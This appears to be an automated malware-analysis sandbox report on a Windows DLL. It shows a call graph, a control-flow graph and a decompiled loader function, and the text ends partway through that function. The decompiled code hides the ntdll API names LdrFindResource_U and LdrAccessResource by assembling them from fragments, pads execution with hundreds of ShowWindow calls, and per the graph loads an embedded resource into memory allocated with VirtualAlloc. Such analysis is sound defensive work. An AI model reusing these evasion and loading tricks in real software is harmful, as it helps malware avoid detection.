_flsall 12403->12406 12407 1000eea0 12404->12407 12406->12376 12409 1000708c _fputc 7 API calls 12407->12409 12408 1000eedb 12410 1000eee8 12408->12410 12411 1000eefe 12408->12411 12409->12406 12452 1000e724 12410->12452 12413 1000b02e _fputc 69 API calls 12411->12413 12415 1000ef03 12413->12415 12414 1000eef6 12511 1000ef29 12414->12511 12416 1000b041 __locking 69 API calls 12415->12416 12416->12414 12419 1000e545 __fileno 69 API calls 12418->12419 12420 1000e587 12419->12420 12421 1000e592 12420->12421 12422 1000e5a9 12420->12422 12423 1000b02e _fputc 69 API calls 12421->12423 12424 1000e5ad 12422->12424 12432 1000e5ba __flsbuf 12422->12432 12434 1000e597 12423->12434 12425 1000b02e _fputc 69 API calls 12424->12425 12425->12434 12426 1000e61b 12427 1000e6aa 12426->12427 12428 1000e62a 12426->12428 12429 1000ee57 __locking 103 API calls 12427->12429 12430 1000e641 12428->12430 12435 1000e65e 12428->12435 12429->12434 12431 1000ee57 __locking 103 API calls 12430->12431 12431->12434 12432->12426 12433 10013630 __flsbuf 69 API calls 12432->12433 12432->12434 12436 1000e610 12432->12436 12433->12436 12434->12376 12435->12434 12562 1001497a 12435->12562 12436->12426 12559 1000e6db 12436->12559 12440 1000c36a __getptd_noexit 69 API calls 12439->12440 12441 1000b046 12440->12441 12441->12403 12443 10014b9c _flsall 12442->12443 12444 10014bf7 12443->12444 12447 1000ba3c __lock 69 API calls 12443->12447 12445 10014c19 _flsall 12444->12445 12446 10014bfc EnterCriticalSection 12444->12446 12445->12408 12446->12445 12448 10014bc8 12447->12448 12449 10014bdf 12448->12449 12450 10013b8c ___lock_fhandle InitializeCriticalSectionAndSpinCount 12448->12450 12514 10014c27 12449->12514 12450->12449 12453 1000e733 __ftelli64_nolock 12452->12453 12454 1000e765 12453->12454 12455 1000e78c 12453->12455 12485 1000e75a 12453->12485 12457 1000b041 __locking 69 API calls 12454->12457 12458 1000e7f4 12455->12458 12459 1000e7ce 12455->12459 12456 10007528 __setlocale_set_cat 5 API calls 12460 1000ee55 12456->12460 12461 1000e76a 12457->12461 12463 1000e808 12458->12463 12518 100148f5 12458->12518 12462 1000b041 __locking 69 API calls 12459->12462 12460->12414 12464 1000b02e _fputc 69 API calls 12461->12464 12465 1000e7d3 12462->12465 12528 10013630 12463->12528 12467 1000e771 12464->12467 12469 1000b02e _fputc 69 API calls 12465->12469 12470 1000708c _fputc 7 API calls 12467->12470 12473 1000e7dc 12469->12473 12470->12485 12471 1000e813 12472 1000eab9 12471->12472 12477 1000c3e3 __getptd 69 API calls 12471->12477 12475 1000ed88 WriteFile 12472->12475 12476 1000eac9 12472->12476 12474 1000708c _fputc 7 API calls 12473->12474 12474->12485 12480 1000ea9b 12475->12480 12481 1000edbb GetLastError 12475->12481 12478 1000eba7 12476->12478 12501 1000eadd 12476->12501 12479 1000e82e GetConsoleMode 12477->12479 12500 1000ec87 12478->12500 12503 1000ebb6 12478->12503 12479->12472 12483 1000e859 12479->12483 12482 1000ee06 12480->12482 12480->12485 12487 1000edd9 12480->12487 12481->12480 12482->12485 12486 1000b02e _fputc 69 API calls 12482->12486 12483->12472 12484 1000e86b GetConsoleCP 12483->12484 12484->12480 12509 1000e88e 12484->12509 12485->12456 12489 1000ee29 12486->12489 12491 1000ede4 12487->12491 12492 1000edf8 12487->12492 12488 1000eb4b WriteFile 12488->12481 12488->12501 12496 1000b041 __locking 69 API calls 12489->12496 12490 1000eced WideCharToMultiByte 12490->12481 12493 1000ed24 WriteFile 12490->12493 12497 1000b02e _fputc 69 API calls 12491->12497 12540 1000b054 12492->12540 12499 1000ed5b GetLastError 12493->12499 12493->12500 12494 1000ec2b WriteFile 12494->12481 12494->12503 12496->12485 12498 1000ede9 12497->12498 12502 1000b041 __locking 69 API calls 12498->12502 12499->12500 12500->12480 12500->12482 12500->12490 12500->12493 12501->12480 12501->12482 12501->12488 12502->12485 12503->12480 12503->12482 12503->12494 12505 100140d4 11 API calls __putwch_nolock 12505->12509 12506 1000e93a WideCharToMultiByte 12506->12480 12508 1000e96b WriteFile 12506->12508 12507 100137cc 81 API calls __fassign 12507->12509 12508->12481 12508->12509 12509->12480 12509->12481 12509->12505 12509->12506 12509->12507 12510 1000e9bf WriteFile 12509->12510 12537 1001381e 12509->12537 12510->12481 12510->12509 12558 10014c30 LeaveCriticalSection 12511->12558 12513 1000ef31 12513->12406 12517 1000b962 LeaveCriticalSection 12514->12517 12516 10014c2e 12516->12444 12517->12516 12545 10014b19 12518->12545 12520 10014913 12521 1001491b 12520->12521 12522 1001492c SetFilePointer 12520->12522 12523 1000b02e _fputc 69 API calls 12521->12523 12524 10014944 GetLastError 12522->12524 12526 10014920 12522->12526 12523->12526 12525 1001494e 12524->12525 12524->12526 12527 1000b054 __dosmaperr 69 API calls 12525->12527 12526->12463 12527->12526 12529 1001363d 12528->12529 12530 1001364c 12528->12530 12531 1000b02e _fputc 69 API calls 12529->12531 12533 1000b02e _fputc 69 API calls 12530->12533 12536 10013670 12530->12536 12532 10013642 12531->12532 12532->12471 12534 10013660 12533->12534 12535 1000708c _fputc 7 API calls 12534->12535 12535->12536 12536->12471 12538 100137e6 __isleadbyte_l 79 API calls 12537->12538 12539 1001382d 12538->12539 12539->12509 12541 1000b041 __locking 69 API calls 12540->12541 12542 1000b05f __dosmaperr 12541->12542 12543 1000b02e _fputc 69 API calls 12542->12543 12544 1000b072 12543->12544 12544->12485 12546 10014b26 12545->12546 12547 10014b3e 12545->12547 12548 1000b041 __locking 69 API calls 12546->12548 12550 1000b041 __locking 69 API calls 12547->12550 12557 10014b83 12547->12557 12549 10014b2b 12548->12549 12551 1000b02e _fputc 69 API calls 12549->12551 12552 10014b6c 12550->12552 12553 10014b33 12551->12553 12554 1000b02e _fputc 69 API calls 12552->12554 12553->12520 12555 10014b73 12554->12555 12556 1000708c _fputc 7 API calls 12555->12556 12556->12557 12557->12520 12558->12513 12560 10009e47 __malloc_crt 69 API calls 12559->12560 12561 1000e6f0 12560->12561 12561->12426 12563 10014986 _flsall 12562->12563 12564 100149b3 12563->12564 12565 10014997 12563->12565 12567 100149c1 12564->12567 12569 100149e2 12564->12569 12566 1000b041 __locking 69 API calls 12565->12566 12568 1001499c 12566->12568 12570 1000b041 __locking 69 API calls 12567->12570 12573 1000b02e _fputc 69 API calls 12568->12573 12571 10014a02 12569->12571 12572 10014a28 12569->12572 12574 100149c6 12570->12574 12575 1000b041 __locking 69 API calls 12571->12575 12576 10014b90 ___lock_fhandle 70 API calls 12572->12576 12583 100149a4 _flsall 12573->12583 12577 1000b02e _fputc 69 API calls 12574->12577 12578 10014a07 12575->12578 12579 10014a2e 12576->12579 12580 100149cd 12577->12580 12582 1000b02e _fputc 69 API calls 12578->12582 12584 10014a57 12579->12584 12585 10014a3b 12579->12585 12581 1000708c _fputc 7 API calls 12580->12581 12581->12583 12587 10014a0e 12582->12587 12583->12434 12586 1000b02e _fputc 69 API calls 12584->12586 12588 100148f5 __lseeki64_nolock 71 API calls 12585->12588 12589 10014a5c 12586->12589 12590 1000708c _fputc 7 API calls 12587->12590 12591 10014a4c 12588->12591 12592 1000b041 __locking 69 API calls 12589->12592 12590->12583 12594 10014a89 12591->12594 12592->12591 12597 10014c30 LeaveCriticalSection 12594->12597 12596 10014a91 12596->12583 12597->12596 12599 1000689c LeaveCriticalSection 12598->12599 12600 1000687d 12598->12600 12599->12380 12600->12599 12601 10006884 12600->12601 12604 1000b962 LeaveCriticalSection 12601->12604 12603 10006899 12603->12380 12604->12603 13035 100022cb 13038 100022d1 13035->13038 13036 100022f2 13063 10001f80 13036->13063 13038->13036 13041 10001c50 13038->13041 13042 10001c91 13041->13042 13043 10001d68 13041->13043 13044 10001ca4 13042->13044 13045 10006b9c __CxxThrowException@8 RaiseException 13042->13045 13043->13036 13046 10001ce7 13044->13046 13048 10001aa0 std::_String_base::_Xlen 77 API calls 13044->13048 13045->13044 13047 10001d2a 13046->13047 13050 10001aa0 std::_String_base::_Xlen 77 API calls 13046->13050 13051 10001aa0 std::_String_base::_Xlen 77 API calls 13047->13051 13049 10001cb7 13048->13049 13070 100019a0 13049->13070 13053 10001cfa 13050->13053 13054 10001d38 13051->13054 13056 100019a0 std::ios_base::_Init 77 API calls 13053->13056 13057 100019a0 std::ios_base::_Init 77 API calls 13054->13057 13059 10001d13 13056->13059 13060 10001d51 13057->13060 13058 10006b9c __CxxThrowException@8 RaiseException 13058->13046 13062 10006b9c __CxxThrowException@8 RaiseException 13059->13062 13061 10006b9c __CxxThrowException@8 RaiseException 13060->13061 13061->13043 13062->13047 13074 1000488d 13063->13074 13065 10001fb5 13066 10001fc0 13065->13066 13078 10001f20 13065->13078 13068 10001fdf 13066->13068 13082 10004814 13066->13082 13071 100019cd std::_String_base::_Xlen 13070->13071 13072 10001640 ctype 77 API calls 13071->13072 13073 100019f6 13072->13073 13073->13058 13074->13065 13075 10007e89 13074->13075 13076 1000c3e3 __getptd 69 API calls 13075->13076 13077 10007e8e 13076->13077 13077->13065 13079 10001f61 13078->13079 13080 10001f5c 13078->13080 13079->13066 13085 10001e40 13080->13085 13089 10005f4a LeaveCriticalSection 13082->13089 13084 1000481b 13084->13068 13086 10001e54 13085->13086 13087 10001e8b 13086->13087 13088 10001c50 std::ios_base::_Init 77 API calls 13086->13088 13087->13079 13088->13087 13089->13084

                                                                                                                                Executed Functions

                                                                                                                                Function 10002460, Relevance: 1960.2, APIs: 1108, Strings: 10, Instructions: 3693libraryloadermemoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 10002460-10002556 call 10001720 * 3 call 10001b80 * 2 11 10002565-1000265b LoadLibraryA call 10001720 * 4 call 10001b80 * 3 0->11 12 10002558-10002562 call 10006b91 0->12 29 1000266a-1000267a 11->29 30 1000265d-10002667 call 10006b91 11->30 12->11 31 10002689-100037cd ShowWindow * 1100 29->31 32 1000267c-10002686 call 10006b91 29->32 30->29 35 100037d6-10003802 call 10001050 GetProcAddress 31->35 36 100037cf 31->36 32->31 41 10003804 35->41 42 1000380b-10003831 GetProcAddress LdrFindResource_U 35->42 36->35 41->42 43 10003833-10003847 LdrAccessResource 42->43 44 1000384d-1000385a WriteFileGather 42->44 43->44 45 10003860-10003867 44->45 46 100039e7-10003a72 call 10007666 * 3 VirtualAlloc call 10006bf0 call 10001140 call 10002330 call 100047b0 call 10004380 44->46 48 10003879-10003895 45->48 49 10003869-10003876 call 10006b91 45->49 102 10003a74-10003a8b MessageBoxA 46->102 50 100038a7-100038c3 48->50 51 10003897-100038a4 call 10006b91 48->51 49->48 56 100038d5-100038f1 50->56 57 100038c5-100038d2 call 10006b91 50->57 51->50 62 10003900-10003916 56->62 63 100038f3-100038fd call 10006b91 56->63 57->56 67 10003928-10003944 62->67 68 10003918-10003925 call 10006b91 62->68 63->62 69 10003956-10003972 67->69 70 10003946-10003953 call 10006b91 67->70 68->67 75 10003984-100039a0 69->75 76 10003974-10003981 call 10006b91 69->76 70->69 81 100039b2-100039ce 75->81 82 100039a2-100039aa call 10006b91 75->82 76->75 87 100039e0-100039e2 81->87 88 100039d0-100039dd call 10006b91 81->88 90 100039af 82->90 89 10003c04-10003c1c call 10007528 87->89 88->87 90->81 103 10003a9d-10003ab9 102->103 104 10003a8d-10003a9a call 10006b91 102->104 106 10003acb-10003ae7 103->106 107 10003abb-10003ac8 call 10006b91 103->107 104->103 110 10003af9-10003b15 106->110 111 10003ae9-10003af6 call 10006b91 106->111 107->106 112 10003b24-10003b3a 110->112 113 10003b17-10003b21 call 10006b91 110->113 111->110 117 10003b4c-10003b68 112->117 118 10003b3c-10003b49 call 10006b91 112->118 113->112 122 10003b7a-10003b96 117->122 123 10003b6a-10003b77 call 10006b91 117->123 118->117 126 10003ba8-10003bc4 122->126 127 10003b98-10003ba5 call 10006b91 122->127 123->122 128 10003bd6-10003bf2 126->128 129 10003bc6-10003bce call 10006b91 126->129 127->126 128->89 133 10003bf4-10003c01 call 10006b91 128->133 135 10003bd3 129->135 133->89 135->128
                                                                                                                                C-Code - Quality: 98%
                                                                                                                                			E10002460(void* __ebp) {
				signed int _v4;
				CHAR* _v8;
				struct HWND__* _v12;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				struct HWND__* _v64;
				char _v72;
				CHAR* _v80;
				void* _v84;
				CHAR* _v88;
				struct HWND__* _v92;
				intOrPtr _v96;
				char _v100;
				CHAR* _v108;
				struct HWND__* _v112;
				CHAR* _v116;
				void* _v120;
				char _v128;
				char _v132;
				CHAR* _v136;
				struct HWND__* _v140;
				CHAR* _v144;
				CHAR* _v148;
				struct HWND__* _v152;
				char _v156;
				char _v160;
				CHAR* _v164;
				void* _v168;
				CHAR* _v172;
				struct HWND__* _v176;
				CHAR* _v184;
				CHAR* _v192;
				struct HWND__* _v196;
				CHAR* _v200;
				void* _v204;
				CHAR* _v212;
				struct HWND__* _v216;
				CHAR* _v220;
				void* _v224;
				CHAR* _v228;
				void* _v232;
				char _v236;
				CHAR* _v240;
				struct HWND__* _v244;
				CHAR* _v248;
				void* _v252;
				CHAR* _v256;
				void* _v260;
				char _v264;
				char _v268;
				char _v276;
				intOrPtr _v280;
				CHAR* _v288;
				struct HWND__* _v292;
				char _v308;
				intOrPtr _v312;
				char _v316;
				intOrPtr _v320;
				char _v324;
				char _v328;
				struct HWND__* _v332;
				struct HINSTANCE__* _v336;
				struct HWND__* _v340;
				void* _v344;
				char _v348;
				char _v352;
				long _v356;
				void* _v357;
				void* _v365;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t164;
				char* _t1284;
				CHAR* _t1285;
				CHAR* _t1288;
				_Unknown_base(*)()* _t1289;
				signed int _t1294;
				void* _t1296;
				void* _t1302;
				intOrPtr* _t1303;
				int _t1305;
				void* _t1363;
				void* _t1365;
				signed int _t1372;
				void* _t1374;
				void* _t1377;
				signed int _t1378;

				_t1372 =  &_v344;
				_t164 =  *0x1001b694; // 0x9a1487b
				_v4 = _t164 ^ _t1372;
				_v332 = 0;
				_v340 = 0;
				_v324 = 0x17;
				_v320 = 0x1e55;
				_v316 = 0x409;
				_v8 = 0xf;
				_v12 = 0;
				_v28 = 0;
				E10001720(0,  &_v32, "Ldr", 3);
				_v212 = 0xf;
				_v216 = 0;
				_v232 = 0;
				E10001720(0,  &_v236, "Acces", 5);
				_v136 = 0xf;
				_v140 = 0;
				_v156 = 0;
				E10001720(0,  &_v160, "sResource", 9);
				_push( &_v168);
				_push( &_v252);
				_push( &_v56);
				_push(E10001B80( &_v56, _t1363, 0xf,  &_v336));
				E10001B80( &_v56, _t1363, 0xf,  &_v84);
				_t1374 = _t1372 + 0x18;
				_t1381 = _v312 - 0x10;
				if(_v312 >= 0x10) {
					E10006B91(0, 0x10, _t1365, _t1381, _v308);
					_t1374 = _t1374 + 4;
				}
				_v336 = LoadLibraryA("ntdll.dll");
				_v148 = 0xf;
				_v152 = 0;
				_v168 = 0;
				E10001720(0,  &_v172, "LdrF", 4);
				_v240 = 0xf;
				_v244 = 0;
				_v260 = 0;
				E10001720(0,  &_v264, "ind", 3);
				_v108 = 0xf;
				_v112 = 0;
				_v128 = 0;
				E10001720(0,  &_v132, "Resour", 6);
				_v200 = 0xf;
				_v204 = 0;
				_v220 = 0;
				E10001720(0,  &_v224, "ce_U", 4);
				_push( &_v232);
				_push( &_v148);
				_push( &_v288);
				_push( &_v204);
				_push(E10001B80( &_v288, 0x10, 0xf,  &_v316));
				_push(E10001B80( &_v344, 0x10, 0xf,  &_v344));
				E10001B80( &_v344, 0x10, 0xf,  &_v120);
				_t1377 = _t1374 + 0x24;
				_t1382 = _v320 - 0x10;
				if(_v320 >= 0x10) {
					E10006B91(0, 0x10, _t1365, _t1382, _v308);
					_t1377 = _t1377 + 4;
				}
				_v288 = 0xf;
				_v292 = 0;
				_v308 = 0;
				_t1383 = _v260 - 0x10;
				if(_v260 >= 0x10) {
					E10006B91(0, 0x10, _t1365, _t1383, _v280);
					_t1377 = _t1377 + 4;
				}
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
